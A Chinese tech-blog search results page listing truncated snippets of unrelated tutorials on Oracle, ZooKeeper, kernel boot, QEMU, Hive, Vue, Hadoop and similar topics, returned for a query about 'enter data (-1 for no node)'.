  • 操作系统Oracle Linux 7,运行容器数据库,数据库企业版,RAC,版本为19.3.0,实例名为ORCLCDB,带一个可插拔数据库orclpdb1。 创建Linux操作系统 创建Linux实例,配置为VM.Standard2.2,启动卷定制为200G。 创建1个...
  • zk客户端操作手册

    千次阅读 2022-01-03 23:29:25
    Enter into the ZooKeeper-cli # connect to the localhost with the default port:2181 bin/zkCli.sh # connect to the remote host with timeout:3s bin/zkCli.sh -timeout 3000 -server remoteIP:2181
  • Kernel 启动流程梳理

    万次阅读 2021-11-25 02:10:07
    after_dashes = parse_args("Booting kernel", static_command_line, __start___param, __stop___param - __start___param, -1, -1, NULL, &unknown_bootoption); if (!IS_ERR_OR_NULL(after_...
  • qemu-system-x86_64(1)-Linux手册页

    千次阅读 2020-10-08 18:27:11
    qemu-system-x86_64名称概要描述选项printf ``letmein'' > mypasswd.txt # qemu-system-x86_64 -object secret,id=sec0,file=mypasswd.txt,format=raw ...$ man 1 qemu-system-x86_64 名称 qemu-doc-QEMU版本4.
  • Hive 安装 以及使用 DataGrip 连接 Hive

    千次阅读 2021-06-13 14:13:13
    Hive 安装 以及使用 DataGrip 连接 HiveHive 安装说明Hive 安装前的准备Hive 安装Hive 启动Hive 安装常见的问题 Hive 安装说明 ① 环境说明 Hadoop 环境已通过腾讯云服务器完成搭建,我是将 hive 安装到 该 hadoop ...
  • Vue 15v-for循环中key属性的使用

    千次阅读 2019-01-02 15:49:42
    15v-for循环中key属性的使用.html &lt;!DOCTYPE html&gt; &lt;html&gt; &...15v-for循环中key属性的使用&lt;/title&gt; &lt;script type="text/javascript&
  • 目录 一、使用前提 二、基本属性 列参数 ...1. 在html中引用table相应的包 <link rel="stylesheet" type="text/css" href="css/bootstrap-table.min.css"/> <script src="js/boot...
  • 2 创建一个新的DBC(CANdb network file (Data Base for CAN)) 3 创建CAN网络当中的Network nodes网络节点 4 创建CAN网络当中的Message消息 5 创建Message消息中Signals信号 5.1 创建Signal信号 5.2 在Message...
  • flask-bootstrap-table中文使用说明

    千次阅读 2019-02-27 10:23:11
    data-search-on-enter-key Boolean false 默认false不启用,设为true启用,比功能是与上面相比,在搜索框内输入内容并且按下回车键才开始搜索 strictSearch data-strict-search ...
  • 在yarn fairScheduler中使用node-label特性

    千次阅读 2018-03-13 23:45:58
    连接地址:http://doc.mapr.com/display/MapR/Label-based+Scheduling+for+YARN+Applications#Label-basedSchedulingforYARNApplications-CreatingQueueLabelsLabel-based Scheduling for YARN ApplicationsSkip to ...
  • THE GUIDE FOR NODE.JS, EXPRESS, JADE, AND MONGODB SET UP THE FULL STACK AND HAVE A WEBPAGE RUNNING IN 30 MINUTES. MAKE IT TALK TO YOUR DB IN ANOTHER 30. By  Christopher Buecheler ...
  • Failed to execute ‘removeChild’ on ‘Node’: The node to be removed is not a child of this node. 问题背景: 在我之前的博文 VUEJS项目实践五之Dialog弹出框MessageBox(超好看的bootstrap样式) 中有介绍一...
  • mpathd (14f504e46494c45526147693538302d577037452d39596459) dm-1 OPNFILER,VIRTUAL-DISK  size=30G features='0' hwhandler='0' wp=rw |-+- policy='service-time 0' prio=1 status=active | `- 34:0:0...
  • hadoop学习1--hadoop2.7.3集群环境搭建

    千次阅读 2016-11-23 11:51:28
    下面的部署步骤,除非说明是在哪个服务器上操作,否则默认为在所有服务器上都要操作。为了方便,使用root用户。  1.准备工作 ... node1 192.168.174.133  node2 192.168.174.134  1.2 软件包  hadoo

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 20,612
精华内容 8,244
关键字:

enter data (-1 for no node)什么意思